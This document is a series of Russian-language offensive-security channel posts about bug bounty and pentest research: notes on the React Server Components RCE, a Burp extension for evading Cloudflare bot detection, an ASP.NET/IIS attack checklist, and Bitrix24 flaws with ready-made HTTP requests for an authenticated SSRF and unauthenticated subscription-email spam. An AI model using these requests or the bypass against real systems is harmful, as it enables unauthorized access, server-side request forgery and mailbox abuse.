https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
React UNAUTH RCE
CVSS 10
По патчу успел понять в чем проблема (PoC пока пишу)
Уже сейчас могу сказать что похоже действительно уязвимы прям стандартные версии
То есть разработчику не нужно даже написать стремный код / использовать конкретный модуль
Достаточно написать:

npx create-next-app

То есть имеем очень страшное RCE by default на миллионах сайтов
Реверсим патч и лутаем миллионы на багбаунти...

апдейт по React-RCE.

списался с несколькими своими коллегами, кто тоже ковыряет эту историю. да, нас всех конкретно сбила с толку публичная демка.
но важно другое.

сам автор уязвимости / эксплойта прямым текстом сказал:
то, что сейчас гуляет по паблику — шляпа.
https://react2shell.com/
мы пошли по ложному следу.
нормальный рабочий вектор — есть, надо стараться жёстче.

по факту у нас что есть:

- десериализация
- модель угроз для RSC остаётся очень жирной
- просто путь эксплуатации явно сложнее, чем “запусти vm.runInThisContext и внедри команду”

сейчас я пойду прогуляюсь, подышу прекрасным московским воздухом,
потом закрою пару важных дел по основной движухе
и этой же ночью продолжу копать реальный вектор.

отдельно спасибо всем, кто отозвался.
проснуться к вечеру, увидеть плюс к подписчикам и корректную обратную связь — это кайф.
дальше контента будет больше: тут в основном внутрянка, AD, Red Team, оффенсив, всё как вы любите.

и да, RCE-класс уязвимости в таком звере, как React, — это жирный таргет для всех:
внутрянщиков, веберов, мобилщиков, аппсек спецов.
если оно там есть — это уже архитектурная история, а не просто “ещё один баг”.

ну и главное, что ещё раз всплыло за эту ночь:
когда реально ресёрчишь, тебя будет качать.
то “всё фейк”, то “это абсурд”, то “я вообще не туда смотрю”.

нормально.
главное — не терять голову и не терять веру в то, что ты докопаешься до сути.
остальное — шум.

👾

Cloudflare has recently started blocking proxy tools such as Burp Suite by detecting their unique TLS and request fingerprints.

If you encounter this issue, install the "Bypass Bot Detection" extension from the BApp Store. It spoofs Burp’s TLS fingerprint to resemble normal browser traffic and bypass the block.

https://github.com/PortSwigger/bypass-bot-detection

#bugbountytips

Баги и фичи ASP.NET и IIS’a 2.0

Скоро новый год и праздники, а это значит, что после загруженных недель будет достаточно времени, чтобы изучить для себя что-то новенькое!
Поэтому в этом посте я решил собрать для вас свои заметки/ссылки по багам и фичам ASP.NET и IIS’a. Да-да, я уже постил запись и презентацию своего доклада по этой же теме 2 апреля, но там я много всего не рассказал из-за временных рамок, так что советую ознакомиться с этой полной версией;)

P.S. Рекомендую читать статьи Soroush Dalili в веб-архиве, а то после обновления дизайна сайта некоторые статьи пошли по одному месту=)

А теперь переходим к материалу:

1) Как понять, что перед тобой IIS/ASP.NET
1.1) HTTP-заголовки:

Server: Microsoft-IIS/X – веб-сервер и его версия
X-Powered-By: ASP.NET – технология на backend’е
X-AspNet-Version: X –  версия ASP.NET
Microsoft-HTTPAPI/X – компонент Windows для обработки HTTP-запросов без полноценного IIS

1.2) Ошибки: Ошибка_IIS, ошибка_ASP.NET

2) Что делать с заголовком Microsoft-HTTPAPI/2.0:
Появляется из-за того, что указано невалидное значение в HTTP-заголовке Host. Поэтому стоит подобрать валидное значение(Перебрать поддомен/домен, попробовать внутренние адреса)

3) Раскрытие локального IP-адреса: [1], [2]

4) Раскрытие инфы о хосте через NTLM аутентификацию

5) Cookieless session
5.1) XSS через ResolveUrl
5.2) CVE-2023-36899 и CVE-2023-36560
5.3) Раскрытие исходного кода

6) IIS Tilde Enumeration: [1], [2], [3]

7) File upload vulnerabilities
7.1) web.config: [1], [2]
7.2) XAMLX
7.3) php под IIS
7.4) Точка с запятой и двоеточие: [1], [2], [3]
7.5) Windows 8.3 feature (можно загрузить файл с SNF именем)
7.6) RESX
7.7) Stored XSS через необычные форматы

8) Deserialization вектора
8.1) ViewState: [1], [2]
8.2) .NET Remoting

9) Waf Bypass (x-up-devcap-post-charset)

10) HTTP Request Smuggling 2025

11) 107 Hacking IIS and NET Kevin Miller

А это очень круто... это как bloodyAD, только в BOF'ах 😳

https://github.com/P0142/LDAP-Bof-Collection

#redteam #pentest #soft #git #ad

На фоне react2shell тихо появилась CVE-2025-54100, которая позволяла выполнять код в windows через curl запрос js файла с <script>alert(1)</script>

Простите, что?

PoC

Решил сделать последний в этом году пост про наш любимый битрикс:

Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint

В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и пр. Подробнее про это можете прочитать ТУТ.
Нас же интересует здесь то, что мы можем использовать данную функциональность для SSRF-атак, главное - это иметь любую валидную учётку:

GET /bitrix/components/bitrix/sharepoint.link/ajax.php?mode=test&sp_server=http://collaborator&sp_user=&sp_pass=&sessid=... HTTP/1.1 
Host: bitrix24 
Cookie: ... 
Bx-Ajax: true

Возможно данная функциональность может встретиться и в обычном битриксе, но это я оставляю на проверку вам:D

Неавторизированный спам электронными письмами через sender_sub_confirm.php

Можно захламить любой почтовый ящик письмами о подтверждении подписки, причём для этого не нужно иметь УЗ битрикс:

POST /bitrix/tools/sender_sub_confirm.php HTTP/1.1 
Host: bitrix 
Cookie: ... 
Content-Type: application/x-www-form-urlencoded 
Content-Length: x 
 
sessid=...&sender_subscription=add&SENDER_SUBSCRIBE_EMAIL=some@some.com

На ББ вряд-ли примут, но как бага для проекта - самое то.

P.S. @FaLLenSkiLL если ты будешь добавлять это в свой Bitrix Ultimate Pentest Guide, докинь пж SSRF через /bitrix/components/bitrix/main.urlpreview/ajax.php и /bitrix/tools/html_editor_action.php, а то лень каждый раз ползти в PDFку отдельно и копировать запрос=)